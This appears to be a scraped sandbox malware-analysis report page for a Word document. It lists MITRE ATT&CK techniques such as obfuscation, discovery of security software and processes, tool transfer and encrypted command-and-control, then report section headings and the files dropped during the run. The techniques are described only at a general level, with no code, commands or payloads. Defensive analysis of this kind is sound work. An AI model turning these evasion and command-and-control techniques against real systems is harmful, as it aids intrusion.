Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report test.doc.bin.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4klbl1ub.dwx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4x3yq1xb.l4b.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qipbli5x.oll.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tncimzkk.ehr.ps1

C:\Users\user\AppData\Local\Temp\~DF35B4DC1311DF4CA7.TMP

C:\Users\user\AppData\Local\Temp\~DF3DA8A12EBD5A43AF.TMP

C:\Users\user\AppData\Local\Temp\~DFB8F1A9633CF44C48.TMP

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YZ6J21D07WGT9SUPJOMP.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

C:\Users\user\Desktop\test.doc.bin.doc (copy)

C:\Users\user\Desktop\~$st.doc.bin.doc

C:\Users\user\Desktop\~WRD0000.tmp

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Static File Info

General

File Icon

Static OLE Info

General

Windows Analysis Report
test.doc.bin.doc